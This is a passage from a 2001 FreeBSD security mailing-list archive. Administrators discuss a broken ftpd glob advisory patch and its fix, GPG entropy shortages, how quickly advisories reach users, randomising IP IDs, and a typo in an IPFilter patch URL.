Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 13:48:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from hq.stars.eu.org (pa54.bialystok.sdi.tpnet.pl [213.25.59.54]) by hub.freebsd.org (Postfix) with SMTP id 022DD37B43F for ; Tue, 17 Apr 2001 13:48:08 -0700 (PDT) (envelope-from spock@stars.eu.org) Received: (qmail 63887 invoked by uid 1001); 17 Apr 2001 20:47:58 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 17 Apr 2001 20:47:58 -0000 Date: Tue, 17 Apr 2001 22:47:58 +0200 (CEST) From: Marcin Jurczuk To: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Is it just me or the patch against 4.2-REL says: cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/gen/glob.c -o glob.o /usr/src/lib/libc/../libc/gen/glob.c: In function `glob': /usr/src/lib/libc/../libc/gen/glob.c:171: `GLOB_MAXPATH' undeclared (first use in this function) /usr/src/lib/libc/../libc/gen/glob.c:171: (Each undeclared identifier is reported only once /usr/src/lib/libc/../libc/gen/glob.c:171: for each function it appears in.) /usr/src/lib/libc/../libc/gen/glob.c: In function `globextend': /usr/src/lib/libc/../libc/gen/glob.c:689: `GLOB_LIMIT' undeclared (first use in this function) *** Error code 1 I try this on one 4.2-RELEASE and 4.2-STABLE - the results was as above Marcin Jurczuk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 13:57:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from router.pagearts.co.za (router.pagearts.co.za [196.25.102.154]) by hub.freebsd.org (Postfix) with ESMTP id 7072637B423 for ; Tue, 17 Apr 2001 13:56:56 -0700 (PDT) (envelope-from james@pagearts.co.za) Received: from boubou (localhost [127.0.0.1]) by router.pagearts.co.za (8.11.0/8.10.1) with SMTP id f3HKslx12664 for ; Tue, 17 Apr 2001 22:54:47 +0200 Message-ID: <026a01c0c780$e4ab3260$4501a8c0@boubou> From: "James Greenfield" To: Subject: GPG and "Not enough random bytes available" Date: Tue, 17 Apr 2001 22:56:36 +0200 MIME-Version: 1.0 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Content-type: multipart/mixed; boundary="=_IS_MIME_Boundary" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --=_IS_MIME_Boundary Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit ----------------------------------------- (on router.pagearts.co.za) Mail scanned with Trend Antivirus Interscan Viruswall --------------------------------------------------------- --=_IS_MIME_Boundary Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit I've just installed GPG 1.0.4 on FreeBSD 4.2-RELEASE. Any attempt to generate a keypair results in a message to the effect of "Not enough random bytes available". Regardless of how much work I make the system do it doesn't seem to do anything more, GPG just sits there with a blank expression on its face. Some searches on the Web seem to indicate a possible patch to clock.c that may be the cause of this problem? What's of some concern to me is that all the threads around this issue seem to indicate that it should require no more than about 24 bytes of random data, but the message displayed indicates that 300 bytes more are required. This seems like an awful lot of random data. The messages above also seemed to indicate that a reboot may result in enough random data for a couple of email messages, but that seems pretty drastic. I realise that there are probably better places to search for this info, but I'm just getting into FreeBSD again and this is the first time I've been in a position where I can actively maintain a server that's online (admittedly not a particularly high profile one, but we've had a couple of people poking around already, nothing like learning on the job :) Regards James Greenfield --=_IS_MIME_Boundary-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 14: 2: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from hex.databits.net (hex.databits.net [207.29.192.16]) by hub.freebsd.org (Postfix) with SMTP id 4C51237B423 for ; Tue, 17 Apr 2001 14:01:58 -0700 (PDT) (envelope-from petef@hex.databits.net) Received: (qmail 19631 invoked by uid 1001); 17 Apr 2001 21:03:03 -0000 Date: Tue, 17 Apr 2001 17:03:03 -0400 From: Pete Fritchman To: James Greenfield Cc: freebsd-security@FreeBSD.ORG Subject: Re: GPG and "Not enough random bytes available" Message-ID: <20010417170303.D17908@databits.net> References: <026a01c0c780$e4ab3260$4501a8c0@boubou> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <026a01c0c780$e4ab3260$4501a8c0@boubou>; from james@pagearts.co.za on Tue, Apr 17, 2001 at 10:56:36PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ++ 17/04/01 22:56 +0200 - James Greenfield: | Any attempt to generate a keypair results in a message to the effect of "Not | enough random bytes available". See rndcontrol(8), you can help generate entropy by using interrupts. You can also set rand_irqs to a space-delimited list of IRQs to feed to rndcontrol at boot. -pete -- Pete Fritchman Databits Network Services, Inc. finger petef@databits.net for PGP key To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 14: 5:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id 3DB9837B424 for ; Tue, 17 Apr 2001 14:05:27 -0700 (PDT) (envelope-from anderson@centtech.com) Received: (from smap@localhost) by proxy.centtech.com (8.8.4/8.6.9) id QAA25420; Tue, 17 Apr 2001 16:04:52 -0500 (CDT) Received: from sprint.centtech.com(10.177.173.31) by proxy.centtech.com via smap (V2.0/2.1+anti-relay+anti-spam) id xma025418; Tue, 17 Apr 01 16:04:23 -0500 Received: from centtech.com (shiva [10.177.173.77]) by sprint.centtech.com (8.9.3+Sun/8.9.3) with ESMTP id QAA27363; Tue, 17 Apr 2001 16:04:23 -0500 (CDT) Message-ID: <3ADCAFD7.C7CE4EF6@centtech.com> Date: Tue, 17 Apr 2001 16:04:23 -0500 From: Eric Anderson Reply-To: anderson@centtech.com Organization: Centaur Technology X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.14-5.0smp i686) X-Accept-Language: en MIME-Version: 1.0 To: Marcin Jurczuk Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does this belong on the "freebsd-security" mailing list? Marcin Jurczuk wrote: > > >Is it just me or the patch against 4.2-REL says: > > cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include > -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE > -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c > /usr/src/lib/libc/../libc/gen/glob.c -o glob.o > /usr/src/lib/libc/../libc/gen/glob.c: In function `glob': > /usr/src/lib/libc/../libc/gen/glob.c:171: `GLOB_MAXPATH' undeclared > (first use in this function) > /usr/src/lib/libc/../libc/gen/glob.c:171: (Each undeclared identifier > is reported only once > /usr/src/lib/libc/../libc/gen/glob.c:171: for each function it > appears in.) > /usr/src/lib/libc/../libc/gen/glob.c: In function `globextend': > /usr/src/lib/libc/../libc/gen/glob.c:689: `GLOB_LIMIT' undeclared > (first use in this function) > *** Error code 1 > > I try this on one 4.2-RELEASE and 4.2-STABLE - the results was as above > > Marcin Jurczuk > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- ------------------------------------------------------------------------------- Eric Anderson anderson@centtech.com Centaur Technology (512) 418-5792 Never have so many understood so little about so much. ------------------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 14:13:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from zork.punq.net (punq.net [207.154.84.94]) by hub.freebsd.org (Postfix) with SMTP id 371BB37B422 for ; Tue, 17 Apr 2001 14:13:45 -0700 (PDT) (envelope-from marcus@zork.punq.net) Received: (qmail 3648 invoked by uid 1000); 17 Apr 2001 21:13:41 -0000 Date: Tue, 17 Apr 2001 14:13:41 -0700 From: Marcus Reid To: freebsd-security@freebsd.org Subject: Latency of security notifications Message-ID: <20010417141340.A3580@blazingdot.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Coffee-Level: high Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi: When I joined the freebsd-security-notifications mailing list, I set it up so that I got paged when an email came in from it, and forwarded the email to my other mailboxes, thinking that it was the best source of early-warning information possible. However there's been a couple of recent vulnerabilities that I heard about from somewhere else first. What are the best sources for early-warning security notifications? -- Marcus Reid Blazingdot.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 14:14:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from bluenugget.net (skin-flute.com [64.3.150.188]) by hub.freebsd.org (Postfix) with ESMTP id 5291337B424 for ; Tue, 17 Apr 2001 14:14:15 -0700 (PDT) (envelope-from geniusj@bluenugget.net) Received: from worsehalf (sf-gw.epylon.com [63.93.9.98]) by bluenugget.net (Postfix) with ESMTP id 8FBCF1367D; Tue, 17 Apr 2001 14:16:33 -0700 (PDT) Message-ID: <004e01c0c783$adb298e0$4904a8c0@epylon.lan> From: "Jason DiCioccio" To: , "Marcin Jurczuk" Cc: References: <3ADCAFD7.C7CE4EF6@centtech.com> Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd) Date: Tue, 17 Apr 2001 14:16:32 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2462.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2462.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From: "Eric Anderson" Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd) > Does this belong on the "freebsd-security" mailing list? I think it does, it is regarding the possibility of a borked security patch. > > > > Marcin Jurczuk wrote: > > > > >Is it just me or the patch against 4.2-REL says: > > > > cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include > > -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE > > -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c > > /usr/src/lib/libc/../libc/gen/glob.c -o glob.o > > /usr/src/lib/libc/../libc/gen/glob.c: In function `glob': > > /usr/src/lib/libc/../libc/gen/glob.c:171: `GLOB_MAXPATH' undeclared > > (first use in this function) > > /usr/src/lib/libc/../libc/gen/glob.c:171: (Each undeclared identifier > > is reported only once > > /usr/src/lib/libc/../libc/gen/glob.c:171: for each function it > > appears in.) > > /usr/src/lib/libc/../libc/gen/glob.c: In function `globextend': > > /usr/src/lib/libc/../libc/gen/glob.c:689: `GLOB_LIMIT' undeclared > > (first use in this function) > > *** Error code 1 > > > > I try this on one 4.2-RELEASE and 4.2-STABLE - the results was as above > > > > Marcin Jurczuk > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > -------------------------------------------------------------------------- ----- > Eric Anderson anderson@centtech.com > Centaur Technology (512) 418-5792 > Never have so many understood so little about so much. > -------------------------------------------------------------------------- ----- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 14:14:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id C859637B424; Tue, 17 Apr 2001 14:14:45 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by peitho.fxp.org (Postfix, from userid 1501) id AFDD613614; Tue, 17 Apr 2001 17:14:45 -0400 (EDT) Date: Tue, 17 Apr 2001 17:14:45 -0400 From: Chris Faulhaber To: Fernando Schapachnik Cc: security@freebsd.org, stable@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd) Message-ID: <20010417171445.B4890@peitho.fxp.org> References: <200104171942.QAA02034@ns1.via-net-works.net.ar> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Yylu36WmvOXNoKYn" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104171942.QAA02034@ns1.via-net-works.net.ar>; from fpscha@ns1.via-net-works.net.ar on Tue, Apr 17, 2001 at 04:42:57PM -0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --Yylu36WmvOXNoKYn Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Apr 17, 2001 at 04:42:57PM -0300, Fernando Schapachnik wrote: > Is it just me or the patch against 4.2-REL says: >=20 > cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include > -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE > -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c > /usr/src/lib/libc/../libc/gen/glob.c -o glob.o > /usr/src/lib/libc/../libc/gen/glob.c: In function `glob': > /usr/src/lib/libc/../libc/gen/glob.c:171: `GLOB_MAXPATH' undeclared > (first use in this function) > /usr/src/lib/libc/../libc/gen/glob.c:171: (Each undeclared identifier > is reported only once > /usr/src/lib/libc/../libc/gen/glob.c:171: for each function it > appears in.) > /usr/src/lib/libc/../libc/gen/glob.c: In function `globextend': > /usr/src/lib/libc/../libc/gen/glob.c:689: `GLOB_LIMIT' undeclared > (first use in this function) > *** Error code 1=20 >=20 >=20 > Where are GLOB_LIMIT and GLOB_MAXPATH supposed to be defined? >=20 The advisory patch is missing the glob.h patch along with the instruction to copy the resulting glob.h to /usr/include. Quick fix is to either get the diff or entire file from http://www.FreeBSD.org/cgi/cvsweb.cgi/src/include/glob.h, copy the resulting file to /usr/include and build. An updated advisory/diff should be available soon. --=20 Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org --Yylu36WmvOXNoKYn Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: FreeBSD: The Power To Serve iEYEARECAAYFAjrcskUACgkQObaG4P6BelDOsACgnKjBgcsVO2EyLI2zTaDtHm8Y zqoAn01xi+hgoeUE0y9NIO+ippK9jl4U =uCyf -----END PGP SIGNATURE----- --Yylu36WmvOXNoKYn-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 14:17:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp.pace.edu (ntutil.pace.edu [205.232.111.9]) by hub.freebsd.org (Postfix) with ESMTP id 16BF137B443 for ; Tue, 17 Apr 2001 14:17:45 -0700 (PDT) (envelope-from js43064n@stmail.pace.edu) Received: from stmail.pace.edu (205.232.111.7:4119) by smtp.pace.edu (LSMTP for Windows NT v1.1b) with SMTP id <0.A8898009@smtp.pace.edu>; Tue, 17 Apr 2001 17:17:44 -0400 Date: Tue, 17 Apr 2001 17:17:41 -0400 Message-Id: <200104171717.AA1124598422@stmail.pace.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: "Jonathan Slivko" Reply-To: To: , Marcus Reid Subject: Re: Latency of security notifications X-Mailer: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Such as? ---------- Original Message ---------------------------------- From: Marcus Reid Date: Tue, 17 Apr 2001 14:13:41 -0700 >Hi: > >When I joined the freebsd-security-notifications mailing list, I set it up >so that I got paged when an email came in from it, and forwarded the email >to my other mailboxes, thinking that it was the best source of early-warning >information possible. However there's been a couple of recent vulnerabilities >that I heard about from somewhere else first. > >What are the best sources for early-warning security notifications? > >-- >Marcus Reid >Blazingdot.com > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- ~~~~ Jonathan M. Slivko Systems Administrator, DataSyrge Internet Services Global IRC Operator, AsylumNet IRC Network ~~~~ -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 14:18:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id 3098A37B422 for ; Tue, 17 Apr 2001 14:18:49 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GBYGIT00.I9Q; Tue, 17 Apr 2001 14:18:29 -0700 Message-ID: <3ADCB335.A36561F1@globalstar.com> Date: Tue, 17 Apr 2001 14:18:45 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Marcus Reid Cc: freebsd-security@FreeBSD.ORG Subject: Re: Latency of security notifications References: <20010417141340.A3580@blazingdot.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Marcus Reid wrote: > > Hi: > > When I joined the freebsd-security-notifications mailing list, I set it up > so that I got paged when an email came in from it, and forwarded the email > to my other mailboxes, thinking that it was the best source of early-warning > information possible. However there's been a couple of recent vulnerabilities > that I heard about from somewhere else first. > > What are the best sources for early-warning security notifications? I think the ones you are referring to got widespread attention when they popped up on Bugtraq. However, I would not trigger my pager off of Bugtraq. -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 14:20:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id BB1C637B424; Tue, 17 Apr 2001 14:20:46 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f3HLJbS92759; Tue, 17 Apr 2001 17:19:41 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Tue, 17 Apr 2001 17:19:34 -0400 (EDT) From: Rob Simmons To: Matt Dillon Cc: Kris Kennaway , Niels Provos , Wes Peters , , , Subject: Re: non-random IP IDs In-Reply-To: <200104171731.f3HHVFu94944@earth.backplane.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 On Tue, 17 Apr 2001, Matt Dillon wrote: > Let me put it another way: I think this sort of thing is an excellent > example of introducing unnecessary kernel bloat into the system. Who > gives a fart whether someone can port scan you efficiently or > anonymously or not? I get port scanned every day. Most hackers don't > even bother with portscans, they just try the exploit on the target > machines directly. You could add a kernel config variable in case someone wants a less bloated kernel. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE63LNpv8Bofna59hYRA/5RAKCIRJTLpcf8kZ7q86QeLrfUzWBM9gCgqhuO GTxP1jwxVOgpsCpfGjx10js= =Y/2k -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 14:43:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from bluenugget.net (skin-flute.com [64.3.150.188]) by hub.freebsd.org (Postfix) with ESMTP id 5693037B423; Tue, 17 Apr 2001 14:43:22 -0700 (PDT) (envelope-from geniusj@bluenugget.net) Received: from worsehalf (sf-gw.epylon.com [63.93.9.98]) by bluenugget.net (Postfix) with ESMTP id A81371367C; Tue, 17 Apr 2001 14:15:16 -0700 (PDT) Message-ID: <004201c0c783$7fe71df0$4904a8c0@epylon.lan> From: "Jason DiCioccio" To: "Darren Reed" , "Alfred Perlstein" Cc: , References: <200104172046.GAA04095@caligula.anu.edu.au> Subject: Re: non-random IP IDs Date: Tue, 17 Apr 2001 14:15:15 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2462.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2462.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From: "Darren Reed" Subject: Re: non-random IP IDs > How long has your box been up ? How many changes to the system config > have been made since then ? If you're not there, and it reboots, will > it come up 100% functional ? Do your computers need some amount of > preventative maintenance like internal cleaning to deal with dust build > up, etc ? I don't know very many if any people that take their machines off the rack just to clean dust out of the case. > How many times do unscheduled reboots result in hardware not > spinning back up and at an inconevient time ? This would happen regardless of when/if you rebooted it. > Any non-trivial change to > startup (or bootup) sequence should be tested and how do you do that > without a reboot ? I use /usr/local/etc/rc.d, so for me it would be 'blah.sh stop && blah.sh start..' If you use rc.local or rc.* usually running the necessary commands while system is up is a good determination on whether it'll work, or putting it in a separate shell script and running that is even better (to make sure that it doesn't go into interactive mode or anything) Not to mention again, this would happen whether you rebooted it right after you made them or whether you rebooted it 6 months from then. > Else where is the egg when that "she'll be right mate" > change fails at 9:00am on Monday morning and you've slept in ? echo -n in your startup scripts works wonders :-) > > There is so much more to serious system admin (from your personal desktops > to mainframes) than just applying (security) patches and keeping it running > with no downtime. Well, that is when you don't have hot-swap everything :) > > None of my personal boxes have uptimes that ever exceed 6 months, even my > servers, but I have complete confidence in them rebooting and services being > restarted (modulo file system damage from an unclean shutdown). softupdates should take care of this, and as far as HD trouble, if you're system is really that important then mirror your disks. Cheers, -JD- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 15: 2:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from zork.punq.net (punq.net [207.154.84.94]) by hub.freebsd.org (Postfix) with SMTP id B361537B422 for ; Tue, 17 Apr 2001 15:02:22 -0700 (PDT) (envelope-from marcus@zork.punq.net) Received: (qmail 3919 invoked by uid 1000); 17 Apr 2001 22:02:21 -0000 Date: Tue, 17 Apr 2001 15:02:21 -0700 From: Marcus Reid To: Jonathan Slivko Cc: freebsd-security@freebsd.org Subject: Re: Latency of security notifications Message-ID: <20010417150221.B3580@blazingdot.com> References: <200104171717.AA1124598422@stmail.pace.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104171717.AA1124598422@stmail.pace.edu>; from js43064n@stmail.pace.edu on Tue, Apr 17, 2001 at 05:17:41PM -0400 Coffee-Level: high Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I saw the ftpd/glob() vulnerability on bugtraq yesterday, and the vulnerability report came out this afternoon. The ntpd vulnerability says Announced: 2001-04-06 but I got the report 2001-04-12. I think it's admirable that the reports come with patches and background, but I'd like to know to disable ntpd as soon as possible while waiting for details. I'm sure there are good reasons that things are the way that they are. My question was not in the spirit of bashing it. I just thought that this forum might be a good place to ask about sources of timely security notifications. On Tue, Apr 17, 2001 at 05:17:41PM -0400, Jonathan Slivko wrote: > Such as? > > ---------- Original Message ---------------------------------- > From: Marcus Reid > Date: Tue, 17 Apr 2001 14:13:41 -0700 > > >Hi: > > > >When I joined the freebsd-security-notifications mailing list, I set it up > >so that I got paged when an email came in from it, and forwarded the email > >to my other mailboxes, thinking that it was the best source of early-warning > >information possible. However there's been a couple of recent vulnerabilities > >that I heard about from somewhere else first. > > > >What are the best sources for early-warning security notifications? > > > >-- > >Marcus Reid > >Blazingdot.com > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > -- > ~~~~ > Jonathan M. Slivko > Systems Administrator, DataSyrge Internet Services > Global IRC Operator, AsylumNet IRC Network > ~~~~ > -- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 16:44:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail2.insweb.com (mail2.insweb.com [204.254.158.36]) by hub.freebsd.org (Postfix) with ESMTP id EB3BB37B423 for ; Tue, 17 Apr 2001 16:44:13 -0700 (PDT) (envelope-from fbsd-secure@ursine.com) Received: from ursine.com (dhcp-4-45-203.users.insweb.com [10.4.45.203]) by mail2.insweb.com (8.11.0/8.11.0) with ESMTP id f3HNi3T52238 for ; Tue, 17 Apr 2001 16:44:03 -0700 (PDT) (envelope-from fbsd-secure@ursine.com) Message-ID: <3ADCD543.8AB7B426@ursine.com> Date: Tue, 17 Apr 2001 16:44:03 -0700 From: Michael Bryan X-Mailer: Mozilla 4.76 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: Re: Latency of security notifications References: <200104171717.AA1124598422@stmail.pace.edu> <20010417150221.B3580@blazingdot.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Marcus Reid wrote: > > I saw the ftpd/glob() vulnerability on bugtraq yesterday, and the > vulnerability report came out this afternoon. The ntpd vulnerability > says Announced: 2001-04-06 but I got the report 2001-04-12. I think > it's admirable that the reports come with patches and background, but > I'd like to know to disable ntpd as soon as possible while waiting for > details. Yeah, this was mentioned in the (lengthy) recent threads about security notifications and binary patches. Bottom line, I think a -lot- of people would be happier if the FreeBSD SAs could go out as soon as possible after a security hole is disclosed publicly in some other forum, even if all they say is words to the effect of "Be aware that this security problem exists, here's a workaround (if any), and we'll be updating this advisory when official patch information is available." That way people can get rapid notification of potential problems without having to read all of freebsd-security, and instead pick it up via -announce, presumably with pager notification if they so desire. Kris, what do you think about this? And I realize that part of the delay for the recent advisories (ntpd, ipfilter, ftpd) was because Kris was out of town for two weeks. But when I heard that, I was surprised, as I didn't realize he had no "backup". In the future, I think it would be a good idea to try and have a second/backup person available who could send out at least the initial SA if Kris isn't available for that task, if at all possible. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 18: 6:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from nisser.com (c0039.upc-c.chello.nl [212.187.0.39]) by hub.freebsd.org (Postfix) with ESMTP id D188437B424 for ; Tue, 17 Apr 2001 18:06:16 -0700 (PDT) (envelope-from roelof@nisser.com) Received: from nisser.com (roelof [10.0.0.2]) by nisser.com (8.9.3/8.9.2) with ESMTP id DAA32881; Wed, 18 Apr 2001 03:05:51 +0200 (CEST) (envelope-from roelof@nisser.com) Message-ID: <3ADCE86F.775F6440@nisser.com> Date: Wed, 18 Apr 2001 03:05:51 +0200 From: Roelof Osinga Organization: Nisser - Nr. 1 in Veiligheid X-Mailer: Mozilla 4.77 [en] (Windows NT 5.0; U) X-Accept-Language: en,pdf MIME-Version: 1.0 To: Kris Kennaway Cc: Tommy Forrest - KE4PYM , Chris Faulhaber , Igor Podlesny , Darren Reed , "freebsd-security@FreeBSD.ORG" Subject: Re: URGENT: Serious bug in IPFilter (fwd) References: <20010416085048.A66477@peitho.fxp.org> <200104162207.SAA10151@ns.shellworld.net> <20010416221732.A20245@xor.obsecurity.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > ... > > ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/ipfilter.patch > > fetch: ipfilter.patch: File unavailable (e.g., file not found, no > > access) > > There was a typo in the advisory; it should be SA-01:32 Will there be an updated 